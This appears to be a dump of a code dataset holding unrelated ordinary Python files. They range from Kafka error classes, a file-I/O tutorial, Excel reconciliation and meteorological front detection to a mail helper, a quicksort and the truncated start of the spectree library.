text
stringlengths 8
6.05M
|
|---|
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Qotto, 2019
""" Contain all consumer errors
"""
__all__ = [
'ConsumerConnectionError',
'AioKafkaConsumerBadParams',
'KafkaConsumerError',
'KafkaConsumerNotStartedError',
'KafkaConsumerAlreadyStartedError',
'ConsumerKafkaTimeoutError',
'IllegalOperation',
'TopicPartitionError',
'NoPartitionAssigned',
'OffsetError',
'UnknownHandler',
'UnknownStoreRecordHandler',
'UnknownHandlerReturn',
'HandlerException',
]
class ConsumerConnectionError(ConnectionError):
"""ConsumerConnectionError
This error was raised when consumer can't connect to Kafka broker
"""
class AioKafkaConsumerBadParams(ValueError):
"""AioKafkaConsumerBadParams
This error was raised when consumer was call with bad params
"""
class KafkaConsumerError(RuntimeError):
"""KafkaConsumerError
This error was raised when an generic error from aiokafka was raised
"""
class KafkaConsumerNotStartedError(RuntimeError):
"""KafkaConsumerNotStartedError
This error was raised when consumer was not started
"""
class KafkaConsumerAlreadyStartedError(RuntimeError):
"""KafkaConsumerAlreadyStartedError
This error was raised when consumer was already started
"""
class ConsumerKafkaTimeoutError(TimeoutError):
"""ConsumerKafkaTimeoutError
This error was raised when Tonga timeout on Kafka broker
"""
class IllegalOperation(TimeoutError):
"""IllegalOperation
This error was raised when topics / partition doesn't exist
"""
class TopicPartitionError(TypeError):
"""TopicPartitionError
This error was raised topics exist but not desired partition
"""
class OffsetError(TypeError):
"""OffsetError
This error was raised when offset was out of range
"""
class NoPartitionAssigned(TypeError):
"""NoPartitionAssigned
This error was raised when no partition was assigned to consumer
"""
class UnknownHandler(TypeError):
"""UnknownHandler
This error was raised when consumer as an event but not handler was found
"""
class UnknownHandlerReturn(TypeError):
"""UnknownHandlerReturn
This error was raised when handler return an unknown value
"""
class UnknownStoreRecordHandler(TypeError):
"""UnknownStoreRecordType
This error was raised when store record handler was unknown
"""
class HandlerException(Exception):
"""HandlerException
This error was raised when in an handler, consumer doesn't commit this message and retries with same handler,
if 5 errors as been raised consumer stop listen event.
"""
|
from flake8.main import main
# python -m flake8 (with Python >= 2.7)
main()
|
def solution(routes):
# [[-20,-15], [-18,-13], [-14,-5], [-5,-3]]
# routes[i][1] > routes[i+1][0]
routes.sort(key=lambda x: x[1])
answer = 1
check = routes[0][1]
for i in range(1, len(routes)):
if check < routes[i][0]:
print(check, routes[i][0])
answer += 1
check = routes[i][1]
return answer
|
from db import db
class PriorityLevel(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String, nullable=False)
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# -------------------- 打开文件 --------------------
print('-' * 20, '打开文件', '-' * 20)
# open(dir, method)
# dir 为文件路径,如果不想打太多\\可以使用raw字符串
# method 打开方式
# r 只读,没有文件则报错
# w 清空文件,再写入
# a 追加模式(从文件尾部开始写入)
# 加 + 读写模式
# 加 b 二进制模式
# python中的文件对象自带迭代器,以行为单位进行迭代,可以使用for line in file
"""
with open('read.txt', 'r') as f:
array = f.readlines()
print(array)
res = 0
for x in array:
a = float(x.rstrip())
res += a
print(res)
"""
# --------------------------------------------------------
# -------------------- 信息查询 --------------------
# --------------------------------------------------------
f = open('read.txt', 'r+')
print(dir(f))
# fileno() 返回一个整型的文件描述符(file descriptor FD 整型),可用于底层操作系统的 I/O 操作
print('文件名为:\t', f.name)
print('打开方式为:\t', f.mode)
print('文件描述为:\t', f.fileno())
# isatty() 检测文件是否连接到一个终端设备,是则返回True,否则返回False
if f.isatty:
print('文件%s已连接到一个终端设备!' % f.name)
else:
print('文件%s未连接到一个终端设备!' % f.name)
# closed 文件是否关闭
if f.closed:
print('文件%s已关闭!' % f.name)
else:
print('文件%s未关闭!' % f.name)
# encoding 获取文件编码
print('%s的编码格式为%s' % (f.name, f.encoding))
print(f.newlines)
f.close()
# --------------------------------------------------------
# -------------------- 文件读取 --------------------
# --------------------------------------------------------
f = open('read.txt', 'r+', encoding='utf-8')
# readline() 从当前指针开始,读取一行
print('读取文件的第一行:\n\t', f.readline())
# readlines() 从当前指针开始,读取所有行
print('读取所有行:\n', f.readlines())
# seek(offset[, whence]) 移动文件读取指针到指定位置
# offset 偏移量
# whence 从哪个地方开始计算偏移,默认 0 文件开头,1 当前位置,2 文件末尾
f.seek(0, 0)
print('移动指针到开头第五个字符!')
# read([size]) 从当前指针开始,读取指定的字节数,如果不指定或提供负值,则读取所有
print('从当前指针开始,读取9个字节:\n', f.read(9))
# tell() 返回文件指针的当前位置
print('文件指针的位置为:\n\t', f.tell())
# newlines 当前指针后是否还有行
f.seek(0, 2)
print('当前指针后是否还有行\n\t', f.newlines)
f.close()
# --------------------------------------------------------
# -------------------- 文件写入 --------------------
# --------------------------------------------------------
f = open('write.txt', 'w+', encoding='utf-8')
# write(str) 向文件中写入字符串,返回字符串长度
input_str = 'hello world!\n'
input_len = f.write('hello world!\n')
print('写入内容为:\n\t%s\n写入长度为:\n\t%s' % (repr(input_str), input_len))
# writelines(seq) 写入一个序列字符串列表,如需换行,需自行手动添加
input_list = ['my name is \n', 'MK\n', 'age:24']
f.writelines(input_list)
print('写入内容为:\n\t', repr(input_list))
# flush() 刷新文件内部缓冲,将缓冲区数据写入文件
f.flush()
print('刷新内部缓冲!')
f.close()
"""
with open('test.txt', 'w') as f:
for i in range(0, 3):
content = input('请输入内容:\n')
f.write(content)
if i == 2:
f.flush()
"""
|
#!/usr/bin/python
import argparse
import sys
import os
# Construct the argument parser
ap = argparse.ArgumentParser()
# Add the arguments to the parser
ap.add_argument("-robot", "--robot", required=True, help="name of the robot")
args = vars(ap.parse_args())
robot = args['robot']
base_path = "$HOME/catkin_ws/src"
os.system('roslaunch hticros rviz_launcher.launch model:="{}/hticros/urdf/{}.urdf"'.format(base_path,robot))
|
import numpy as np
import xarray as xr
from dataset import Dataset
from config import Config
from utils import load_indexing
from crop import crop_center, crop_2d
from sklearn.metrics import jaccard_similarity_score
def equivalent_potential_temperature(temperature, specific_humidity, pressure):
e = pressure / (622 + specific_humidity)
tl = 2840 / (3.5 * np.log(temperature) - np.log(e) - 4.805) + 55
return temperature * (1000 / pressure) ** (0.2854 * (1 - 0.28 * 0.001 * specific_humidity)) * \
np.exp((3.376 / tl - 0.00254) * specific_humidity * (1 + 0.81 * 0.001 * specific_humidity))
def gradient_lcc(field):
return np.gradient(field, 32.463)
def abs_lcc(dx, dy):
return np.sqrt(dx ** 2 + dy ** 2)
def thermal_front_parameter(temperature):
gx, gy = gradient_lcc(temperature)
ga = abs_lcc(gx, gy)
ggx, ggy = gradient_lcc(ga)
return - (ggx * gx + ggy * gy) / ga
def coriolis_parameter(lat):
return 2 * 7.2921 * 10 ** -5 * np.sin(np.deg2rad(lat))
def iou_numpy(outputs: np.array, labels: np.array):
intersection = (outputs & labels).sum()
union = (outputs | labels).sum()
return (intersection + 1e-12) / (union + 1e-12)
class HewsonCriterion:
def __init__(self, tfp_threshold, grad_threshold):
self.tfp_threshold = tfp_threshold / 10000
self.grad_threshold = grad_threshold / 100
def apply(self, temperature):
tfp = thermal_front_parameter(temperature)
temp_grad = abs_lcc(*gradient_lcc(temperature))
grad = temp_grad + 1 / np.sqrt(2) * 32.463 * abs_lcc(*gradient_lcc(temp_grad))
return np.logical_and(tfp > self.tfp_threshold, grad > self.grad_threshold)
class ParfittCriterion:
def __init__(self, threshold):
self.threshold = threshold
def apply(self, temperature, vorticity, coriolis):
grad = abs_lcc(*gradient_lcc(temperature))
return vorticity * grad / (0.45 / 100 * coriolis) > self.threshold
class HewsonVorticityCriterion:
def __init__(self, tfp_threshold, grad_threshold, vorticity_threshold):
self.tfp_threshold = tfp_threshold / 10000
self.grad_threshold = grad_threshold / 100
self.vorticity_threshold = vorticity_threshold
def apply(self, temperature, vorticity, coriolis):
tfp = thermal_front_parameter(temperature)
temp_grad = abs_lcc(*gradient_lcc(temperature))
grad = temp_grad + 1 / np.sqrt(2) * 32.463 * abs_lcc(*gradient_lcc(temp_grad))
vort = vorticity / coriolis
return np.logical_and.reduce(
(tfp > self.tfp_threshold, grad > self.grad_threshold, vort > self.vorticity_threshold))
config = Config(
in_shape=(256, 256),
n_classes=5,
varnames=["T", "Q", "VO"],
filename="/mnt/d4dca524-e11f-4923-8fbe-6066e6efd2fd/ERA5_parameter/era5_regridded.nc",
truth_filename="/mnt/d4dca524-e11f-4923-8fbe-6066e6efd2fd/NARR/plotted_fronts_fat_binary.nc",
batch_size=1,
n_dims=3,
binary=True,
standardize=False
)
train, val, test = load_indexing("indexing.npz")
crit = ParfittCriterion(1)
# crit = HewsonVorticityCriterion(0.75, 1.5, 0.8)
# crit = HewsonCriterion(0.75, 3)
with xr.open_dataset("/mnt/ldm_vol_DESKTOP-DSIGH25-Dg0_Volume1/DiplomData2/NARR/air.2m.nc") as example:
lat = crop_center(crop_2d(example.lat.values), config.in_shape)
lon = crop_center(crop_2d(example.lon.values), config.in_shape)
lon = (lon + 220) % 360 - 180 # Shift due to problems with crossing dateline in cartopy
coriolis = coriolis_parameter(lat)
with Dataset(test, config) as test_dataset:
for i in range(len(test_dataset)):
x, y_true = test_dataset[i]
y_true = y_true[0, ..., 0]
etemp = equivalent_potential_temperature(x[0, ..., 0], x[0, ..., 1], 900)
y_pred = crit.apply(etemp, x[0, ..., 2], coriolis)
# y_pred = crit.apply(etemp)
from plot import plot_results
plot_results(etemp, y_true, y_pred, "plots/criterion/parfitt 1/{}.png".format(i), config.in_shape, test_dataset.get_dates(i)[0],
bw=True, binary=True)
if i > 16:
break
# import matplotlib.colors
# from matplotlib import pyplot as plt
# from cartopy import crs as ccrs
# proj = ccrs.LambertConformal(
# central_latitude=50,
# central_longitude=-107,
# false_easting=5632642.22547,
# false_northing=4612545.65137,
# standard_parallels=(50, 50),
# cutoff=-30
# )
# f = plt.figure(figsize=(8, 8))
# ax = plt.subplot(1, 1, 1, projection=proj)
# shift = ccrs.PlateCarree(central_longitude=-40)
# ax.set_xmargin(0.1)
# ax.set_ymargin(0.1)
# ax.set_extent((2.0e+6, 1.039e+07, 6.0e+5, 8959788), crs=proj)
# plt.contourf(lon, lat, etemp, levels=20, transform=shift)
# cmap = matplotlib.colors.ListedColormap([(0, 0, 0, 0), 'purple'])
# plt.pcolormesh(lon, lat, y_pred, cmap=cmap, zorder=10, transform=shift)
# ax.coastlines()
# ax.gridlines(draw_labels=True)
# plt.show()
|
import pandas as pd
import numpy as np
import pyttsx3
import os
import shutil
import time
from datetime import date
from openpyxl import load_workbook
start = time.time()
print()
today = date.today()
folder_exp = f'E:/Total/Station Data/Master Data/export/AFR_{today}'
if os.path.exists(folder_exp):
shutil.rmtree(f'{folder_exp}')
print(f"le dossier AFR_{today} à été bien supprimer et recréer\n-------------")
print()
else:
print(f"le dossier AFR_{today} n'existe pas\n-------------")
print()
os.mkdir(folder_exp)
# folder_list_affiliate= f'E:/Total/Station Data/Master Data/export/list_affiliate_{today}'
# os.mkdir(folder_list_affiliate)
path_data_SAP = "E:/Total/Station Data/Master Data/Data source/Data-SAP-1.xlsx"
path_data_sharepoint = "E:/Total/Station Data/Master Data/Data source/sharepoint-AFR.xlsx"
path_list = "E:/Total/Station Data/Master Data/Data source/Affiliate_list.xlsx"
def com(df_X, df_Y, col, texte = True):
if texte:
diff_X = np.setdiff1d(df_X[col] ,df_Y[col])
ecart_X = df_X.loc[df_X[col].isin(diff_X)]
print("Données SAP versus données Sharepoint :")
print(f"il y'a {len(diff_X)} code SAP de différence")
print()
diff_Y = np.setdiff1d(df_Y[col], df_X[col])
ecart_Y = df_Y.loc[df_Y[col].isin(diff_Y)]
print("Données Sharepoint versus données SAP :")
print(f"il y'a {len(diff_Y)} code SAP de différence")
commun = df_X.loc[~df_X[col].isin(diff_X)]
return ecart_X, ecart_Y, commun
else:
diff_X = np.setdiff1d(df_X[col] ,df_Y[col])
ecart_X = df_X.loc[df_X[col].isin(diff_X)]
diff_Y = np.setdiff1d(df_Y[col], df_X[col])
ecart_Y = df_Y.loc[df_Y[col].isin(diff_Y)]
commun = df_X.loc[~df_X[col].isin(diff_X)]
return ecart_X, ecart_Y, commun
# def com_1(df_X, df_Y, col):
# diff_X = np.setdiff1d(df_X[col] ,df_Y[col])
# ecart_X = df_X.loc[df_X[col].isin(diff_X)]
# # print("Données SAP versus données Sharepoint :")
# # print(f"il y'a {len(diff_X)} code SAP de différence")
# # print()
# diff_Y = np.setdiff1d(df_Y[col], df_X[col])
# ecart_Y = df_Y.loc[df_Y[col].isin(diff_Y)]
# # print("Données Sharepoint versus données SAP :")
# # print(f"il y'a {len(diff_Y)} code SAP de différence")
# commun = df_X.loc[~df_X[col].isin(diff_X)]
# return ecart_X, ecart_Y, commun
def append_df_to_excel(filename, df, sheet_name='Sheet1', startrow=None,
truncate_sheet=False,
**to_excel_kwargs):
"""
Append a DataFrame [df] to existing Excel file [filename]
into [sheet_name] Sheet.
If [filename] doesn't exist, then this function will create it.
Parameters:
filename : File path or existing ExcelWriter
(Example: '/path/to/file.xlsx')
df : dataframe to save to workbook
sheet_name : Name of sheet which will contain DataFrame.
(default: 'Sheet1')
startrow : upper left cell row to dump data frame.
Per default (startrow=None) calculate the last row
in the existing DF and write to the next row...
truncate_sheet : truncate (remove and recreate) [sheet_name]
before writing DataFrame to Excel file
to_excel_kwargs : arguments which will be passed to `DataFrame.to_excel()`
[can be dictionary]
Returns: None
"""
# ignore [engine] parameter if it was passed
if 'engine' in to_excel_kwargs:
to_excel_kwargs.pop('engine')
writer = pd.ExcelWriter(filename, engine='openpyxl')
try:
# try to open an existing workbook
writer.book = load_workbook(filename)
# get the last row in the existing Excel sheet
# if it was not specified explicitly
if startrow is None and sheet_name in writer.book.sheetnames:
startrow = writer.book[sheet_name].max_row
# truncate sheet
if truncate_sheet and sheet_name in writer.book.sheetnames:
# index of [sheet_name] sheet
idx = writer.book.sheetnames.index(sheet_name)
# remove [sheet_name]
writer.book.remove(writer.book.worksheets[idx])
# create an empty sheet [sheet_name] using old index
writer.book.create_sheet(sheet_name, idx)
# copy existing sheets
writer.sheets = {ws.title:ws for ws in writer.book.worksheets}
except FileNotFoundError:
# file does not exist yet, we will create it
pass
if startrow is None:
startrow = 0
# write out the new sheet
df.to_excel(writer, sheet_name, startrow=startrow, **to_excel_kwargs)
# save the workbook
writer.save()
def comparer(Pays):
if os.path.exists(path_list):
os.remove(path_list)
print("le fichier 'Affiliate_list.xlsx' à été bien supprimer et recréer\n-------------")
else:
print("le fichier 'Affiliate_list.xlsx' n'existe pas\n-------------")
data_sharepoint = pd.read_excel('E:/Total/Station Data/Master Data/Data source/all-data-sharepoint.xlsx')
writer_list = pd.ExcelWriter(path_list, engine = 'openpyxl')
data_sharepoint.to_excel(writer_list, sheet_name = 'Station Data Brute', index=False)
writer_list.save()
writer_list.close()
print()
for i in Pays:
element = i
# print()
print('-'*20)
print(f"Pays : {element}")
print('-'*20)
path_ecart = f"{folder_exp}/{element + '_' + str(today)}.xlsx"
#path_list = f"{folder_list_affiliate}/list_affiliate_{str(today)}.xlsx"
df_sap = pd.read_excel(path_data_SAP, sheet_name=element)
df_sap.rename(columns={'SAPCODE': 'SAPCode'}, inplace=True)
df_sap = df_sap.drop_duplicates(subset = "SAPCode", keep = 'first')
dim_sap = df_sap.shape
print(f"dimension données SAP pour {element} est : {dim_sap}")
df_sap['SAPCode'] = df_sap['SAPCode'].str.strip()
df_sharepoint = pd.read_excel(path_data_sharepoint, sheet_name=element)
df_sharepoint = df_sharepoint.drop_duplicates()
dim_sharepoint = df_sharepoint.shape
print(f"dimension données sharepoint pour {element} est : {dim_sharepoint}")
df_sharepoint['SAPCode'] = df_sharepoint['SAPCode'].str.strip()
print()
print("Comparaison :")
print('-'*7)
X, Y, df_commun_1 = com(df_sap, df_sharepoint, 'SAPCode')
a, cost, df_commun_2 = com(df_commun_1, df_sharepoint, 'SAPCode_BM', texte=False)
b, cost, df_commun_3 = com(df_commun_2, df_sharepoint, 'SAPCode_BM_ISACTIVESITE', texte=False)
writer = pd.ExcelWriter(path_ecart, engine = 'openpyxl')
df_sap.to_excel(writer, sheet_name = 'Data_SAP_Brute', index=False)
df_sharepoint.to_excel(writer, sheet_name = 'Data_Sharepoint_Brute', index=False)
X.to_excel(writer, sheet_name = 'ecart_SAP_vs_Sharepoint', index=False)
Y.to_excel(writer, sheet_name = 'ecart_Sharepoint_vs_SAP', index=False)
a.to_excel(writer, sheet_name = 'SAP_vs_Sharepoint_SAPCode_BM', index=False)
b.to_excel(writer, sheet_name = 'SAP_vs_Sharepoint_SAPCode_BM_ISACTIVESITE', index=False)
writer.save()
writer.close()
print()
print('#'*70)
print()
# sh = pd.read_excel("C:/Users/J1049122/Desktop/Station Data/Master-Data/Data source/Data-SAP.xlsx")
# sh = sh.drop_duplicates()
# sh['SAPCode'] = sh['SAPCode'].str.strip()
# z = sh['Affiliate'].unique()
# # for w in z:
# d = sh[sh['Affiliate']==w]
ecart_sap = X.copy()
ecart_sap = ecart_sap[["SAPCode", "Affiliate", "FINAL_SITENAME", "SITETOWN", "ISACTIVESITE", "BUSINESSMODEL", "BM_source"]]
ecart_sap.columns = ['SAPCode', 'Affiliate', 'SAPName', 'Town', 'IsActiveSite', 'BUSINESSMODEL', 'BM_source']
colonnes = ['Zone', 'SubZone', 'IntermediateStatus', 'Brand', 'Segment', 'ContractMode', 'ShopSegment', 'SFSActivity', 'SFSContractType', 'PartnerOrBrand', 'TargetKit', 'TargetPOSprovider',
'EstimatedInstallationDate', 'InstalledSolutionOnSite', 'SolutionProvider', 'SolutionInstallationDate', 'Status', 'SolutionRelease', 'SystemOwner', 'ConfigurationStatus',
'IsAllPumpsConnectedToFCC', 'Reason', 'AutomaticTankGauging', 'ATGProvider', 'ATGModel', 'ATGConnected', 'ATGInstallationDate', 'TotalCardEPT connection', 'FuelCardProvider',
'EPTHardware', 'EPTModel', 'EPTNumber', 'EPTConnected', 'PaymentLocation', 'HOSInstalled', 'HOSProvider', 'WSMSoftwareInstalled', 'WSMProvider', 'TELECOM', 'STABILITE TELECOM',
'STARTBOXStatus', 'BM_source'
]
for col in colonnes:
ecart_sap[col] = ""
all_cols_ordonner = ['SAPCode', 'Zone', 'SubZone', 'Affiliate', 'SAPName', 'Town',
'IsActiveSite', 'IntermediateStatus', 'Brand', 'Segment',
'BUSINESSMODEL', 'ContractMode', 'ShopSegment', 'SFSActivity',
'SFSContractType', 'PartnerOrBrand', 'TargetKit', 'TargetPOSprovider',
'EstimatedInstallationDate', 'InstalledSolutionOnSite',
'SolutionProvider', 'SolutionInstallationDate', 'Status',
'SolutionRelease', 'SystemOwner', 'ConfigurationStatus',
'IsAllPumpsConnectedToFCC', 'Reason', 'AutomaticTankGauging',
'ATGProvider', 'ATGModel', 'ATGConnected', 'ATGInstallationDate',
'TotalCardEPT connection', 'FuelCardProvider', 'EPTHardware',
'EPTModel', 'EPTNumber', 'EPTConnected', 'PaymentLocation',
'HOSInstalled', 'HOSProvider', 'WSMSoftwareInstalled', 'WSMProvider',
'TELECOM', 'STABILITE TELECOM', 'STARTBOXStatus', 'BM_source']
ecart_sap1=ecart_sap.reindex(columns= all_cols_ordonner)
ecart_sap1['data_source'] = "ecart SAP"
ecart_sap1 = ecart_sap1[ecart_sap1['BUSINESSMODEL'] != 'CLOS']
sh = df_sharepoint.copy()
if a.shape[0] > 0:
for j in range(a.shape[0]):
for k in range(sh.shape[0]):
if a['SAPCode'].iloc[j] == sh['SAPCode'].iloc[k]:
sh['BUSINESSMODEL'].iloc[k] = a['BUSINESSMODEL'].iloc[j]
sh['BM_source'].iloc[k] = a['BM_source'].iloc[j]
sh = sh[['SAPCode', 'Zone', 'SubZone', 'Affiliate', 'SAPName', 'Town','IsActiveSite', 'IntermediateStatus', 'Brand', 'Segment',
'BUSINESSMODEL', 'ContractMode', 'ShopSegment', 'SFSActivity', 'SFSContractType', 'PartnerOrBrand', 'TargetKit', 'TargetPOSprovider',
'EstimatedInstallationDate', 'InstalledSolutionOnSite', 'SolutionProvider', 'SolutionInstallationDate', 'Status',
'SolutionRelease', 'SystemOwner', 'ConfigurationStatus', 'IsAllPumpsConnectedToFCC', 'Reason', 'AutomaticTankGauging',
'ATGProvider', 'ATGModel', 'ATGConnected', 'ATGInstallationDate', 'TotalCardEPT connection', 'FuelCardProvider', 'EPTHardware',
'EPTModel', 'EPTNumber', 'EPTConnected', 'PaymentLocation', 'HOSInstalled', 'HOSProvider', 'WSMSoftwareInstalled', 'WSMProvider',
'TELECOM', 'STABILITE TELECOM', 'STARTBOXStatus', 'BM_source']]
sh['data_source'] = "Station Data"
sh_1 = sh.append(ecart_sap1, ignore_index=True)
book = load_workbook(path_list)
writer_list = pd.ExcelWriter(path_list, engine = 'openpyxl')
writer_list.book = book
sh_1.to_excel(writer_list, sheet_name = element, index=False)
writer_list.save()
writer_list.close()
pays = ['Botswana', 'Ghana', 'Kenya', 'Mauritius', 'Malawi', 'Mozambique', 'Namibia',
'Nigeria', 'Tanzania', 'Uganda', 'South Africa', 'Zambia',
'Zimbabwe', 'Central Afr.Rep', 'Congo', 'Cameroon', 'Gabon', 'Guinea Conakry',
'Equatorial Gui.', 'Morocco', 'Mali', 'Senegal', 'Chad', 'Togo', 'Mayotte']
comparer(pays)
print()
print("--------------------")
print("Terminer avec succès")
print("--------------------")
print()
print(time.ctime(time.time() - start)[11:19])
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#################################################################################
# #
# update_rdb.py: update dataseeker rdb files for ccdm, pacd, mups, and elbi #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# last update: Mar 04, 2021 #
# #
#################################################################################
import os
import sys
import re
import string
import random
import operator
import math
import time
path = '/data/mta/Script/Dumps/Scripts/house_keeping/dir_list'
with open(path, 'r') as f:
data = [line.strip() for line in f.readlines()]
for ent in data:
atemp = re.split(':', ent)
var = atemp[1].strip()
line = atemp[0].strip()
exec("%s = %s" %(var, line))
sys.path.append(bin_dir)
sys.path.append(mta_dir)
#
#--- import several functions
#
import pcadfilter
import ccdmfilter
import maverage
import mta_common_functions as mcf
#
#--- temp writing file name
#
rtail = int(time.time()*random.random())
zspace = '/tmp/zspace' + str(rtail)
#-----------------------------------------------------------------------------------
#-- run_rdb_updates: update dataseeker rdb files of ccdm, pacad, mups, and elbilow -
#-----------------------------------------------------------------------------------
def run_rdb_updates():
"""
update dataseeker rdb files of ccdm, pacad, mups, and elbilow
input: none but read from the current trace log files
output: updated rdb files of ccdm, pacad, mups, and elbilow
"""
#
#--- read the already processed data list
#
pfile = house_keeping + 'rdb_processed_list'
pdata = mcf.read_data_file(pfile)
#
#--- read the currently available data list
#
cmd = 'ls ' + main_dir + '/*.tl > ' + zspace
os.system(cmd)
cdata = mcf.read_data_file(zspace, remove=1)
#
#--- find new data
#
ndata = list(set(cdata) - set(pdata))
#
#--- if there is no new data, exit
#
if len(ndata) == 0:
exit(1)
#
#--- make lists for ccdm, pcad, mups...
#--- also update already processed data list
#
fo = open(pfile, 'w')
fc = open('./ccdmlist', 'w')
fp = open('./pcadlist', 'w')
fm = open('./mupslist1', 'w')
fn = open('./mupslist2', 'w')
fe = open('./elbilist', 'w')
for ent in ndata:
fo.write(ent + '\n')
if make_select_list(fc, ent, 'CCDM'):
continue
if make_select_list(fp, ent, 'PCAD'):
continue
if make_select_list(fm, ent, 'MUPSMUPS1'):
continue
if make_select_list(fn, ent, 'MUPSMUPS2'):
continue
if make_select_list(fe, ent, 'ELBILOW'):
continue
fo.close()
fc.close()
fp.close()
fm.close()
fn.close()
fe.close()
#
#--- run pcad update
#
pcadfilter.pcadfilter('./pcadlist')
#
#--- run ccdm update
#
ccdmfilter.ccdmfilter('./ccdmlist')
#
#--- run mups1 udpate; mups2 update will be done separately
#
maverage.maverage('mupslist1', 'mups_1.rdb')
maverage.maverage('mupslist2', 'mups_2.rdb')
#
#---- run elbi_low update
#
maverage.maverage('elbilist', 'elbi_low.rdb')
elbi_file = ds_dir + 'elbi_low.rdb'
maverage.filtersort(elbi_file)
#
#--- clean up
#
mcf.rm_files('./ccdmlist')
mcf.rm_files('./pcadlist')
mcf.rm_files('./mupslist1')
mcf.rm_files('./mupslist2')
mcf.rm_files('./elbilist')
#---------------------------------------------------------------------------
#-- make_select_list: write a line if the line contain "word" ---
#---------------------------------------------------------------------------
def make_select_list(f, line, word):
"""
write a line if the line contain "word"
input: f --- file indicator
line --- a line to check and add
word --- a word to check whether it is in the line
output: updated file
return True/False
"""
mc = re.search(word, line)
if mc is not None:
line = line.strip()
f.write(line)
f.write('\n')
return True
else:
return False
#---------------------------------------------------------------------------
if __name__ == "__main__":
run_rdb_updates()
|
"""
Utility functions for api module
"""
import re
import smtplib
from email.mime.text import MIMEText
from api.constants import MAIL_HOST, MAIL_PORT
def peek(bucket):
"""
Get first element of set without removing
:param bucket: set to peek
"""
elem = None
for elem in bucket:
break
return elem
def has_required(bucket, required):
"""
Check if all values in required set exist in bucket
:param bucket: set of values to check
:param required: set of required values
:returns bool: True if bucket contains all required
"""
return required <= bucket
def raise_api_exc(exc, status_code):
"""
Helper method to raise api exception with status code
"""
exc.status_code = status_code
raise exc
def replace(string, replxs):
"""
Given a string and a replacement map, it returns the replaced string.
https://goo.gl/7fcBpE
:param str string: string to execute replacements on
:param dict replxs: replacement map {value to find: value to replace}
:rtype: str
"""
substrs = sorted(replxs, key=len, reverse=True)
regexp = re.compile("|".join(map(re.escape, substrs)))
return regexp.sub(lambda match: replxs.get(match.group(0), ""), string)
def send_mail(sender, recievers, subject, tmpl_file, tmpl_data):
"""
Send mail using localhost smtp
:param str sender: email to send from
:param list recievers: list of emails to send to
:param str subject: the email subject
:param str tmpl_file: file path to use as email body template
:param dict tmpl_data: keys to string replacement for email template
"""
with open(tmpl_file, "r") as fstream:
msg = MIMEText(fstream.read())
msg.preamble = subject
msg["Subject"] = subject
msg["From"] = sender
msg["To"] = ", ".join(recievers)
msg = replace(msg.as_string(), tmpl_data)
smtp = smtplib.SMTP(MAIL_HOST, MAIL_PORT)
smtp.sendmail(sender, recievers, msg)
smtp.quit()
return msg
|
"""
Сложность:
1. Худший случай: O(n^2).
2. Лучший случай: O(n * log n).
3. Средний случай: O(n * log n).
Операция разделения массива на две части относительно опорного элемента занимает
время O(log n). Поскольку все операции разделения, проделываемые на одной глубине
рекурсии, обрабатывают разные части исходного массива, размер которого постоянен,
суммарно на каждом уровне рекурсии потребуется также O(n) операций. Следовательно,
общая сложность алгоритма определяется лишь количеством разделений, то есть
глубиной рекурсии. Глубина рекурсии, в свою очередь, зависит от сочетания входных
данных и способа определения опорного элемента.
"""
def quick_sort(collection):
"""
Реализация быстрой сортировки. Рекурсивный вариант.
:param collection: любая изменяемая коллекция с гетерогенными элементами,
которые можно сравнивать.
:return: коллекция с элементами, расположенными по возрастанию.
Examples:
>>> quick_sort([0, 5, 3, 2, 2])
[0, 2, 2, 3, 5]
>>> quick_sort([])
[]
>>> quick_sort([-2, -5, -45])
[-45, -5, -2]
"""
length = len(collection)
if length <= 1:
return collection
else:
# В качестве pivot используется последний элемент.
pivot = collection.pop()
# lesser - часть коллекции, которая меньше pivot, будет тут.
# greater - части коллекции, которая меньше pivot, будет тут.
greater, lesser = [], []
for element in collection:
if element > pivot:
greater.append(element)
else:
lesser.append(element)
# Рекурсивно вызывается функция сортировки отдельно для
# greater и lesser. В конце все части объединяются в единую
# коллекцию. Между ними вставляется pivot.
return quick_sort(lesser) + [pivot] + quick_sort(greater)
if __name__ == "__main__":
user_input = input("Enter numbers separated by a comma:\n").strip()
unsorted = [int(item) for item in user_input.split(",")]
print(quick_sort(unsorted))
|
from collections import defaultdict
from copy import deepcopy
from functools import wraps
from importlib import import_module
from typing import (
Any,
Callable,
Dict,
Mapping,
Optional,
Sequence,
Type,
get_type_hints,
)
from ._types import FunctionDecorator, ModelType, NamingStrategy, NestedNamingStrategy
from .config import Configuration, ModeEnum
from .models import Tag, ValidationError
from .plugins import PLUGINS, BasePlugin
from .response import Response
from .utils import (
default_after_handler,
default_before_handler,
get_model_key,
get_model_schema,
get_nested_key,
get_security,
parse_comments,
parse_name,
parse_params,
parse_request,
parse_resp,
)
class SpecTree:
"""
Interface
:param str backend_name: choose from
('flask', 'quart', 'falcon', 'falcon-asgi', 'starlette')
:param backend: a backend that inherit `SpecTree.plugins.base.BasePlugin`, this will
override the `backend_name` if provided
:param app: backend framework application instance (can be registered later)
:param before: a callback function of the form
:meth:`spectree.utils.default_before_handler`
``func(req, resp, req_validation_error, instance)``
that will be called after the request validation before the endpoint function
:param after: a callback function of the form
:meth:`spectree.utils.default_after_handler`
``func(req, resp, resp_validation_error, instance)``
that will be called after the response validation
:param validation_error_status: The default response status code to use in the
event of a validation error. This value can be overridden for specific endpoints
if needed.
:param kwargs: init :class:`spectree.config.Configuration`, they can also be
configured through the environment variables with prefix `spectree_`
"""
def __init__(
self,
backend_name: str = "base",
backend: Optional[Type[BasePlugin]] = None,
app: Any = None,
before: Callable = default_before_handler,
after: Callable = default_after_handler,
validation_error_status: int = 422,
validation_error_model: Optional[ModelType] = None,
naming_strategy: NamingStrategy = get_model_key,
nested_naming_strategy: NestedNamingStrategy = get_nested_key,
**kwargs: Any,
):
self.naming_strategy = naming_strategy
self.nested_naming_strategy = nested_naming_strategy
self.before = before
self.after = after
self.validation_error_status = validation_error_status
self.validation_error_model = validation_error_model or ValidationError
self.config: Configuration = Configuration.parse_obj(kwargs)
self.backend_name = backend_name
if backend:
self.backend = backend(self)
else:
plugin = PLUGINS[backend_name]
module = import_module(plugin.name, plugin.package)
self.backend = getattr(module, plugin.class_name)(self)
self.models: Dict[str, Any] = {}
if app:
self.register(app)
def register(self, app: Any):
"""
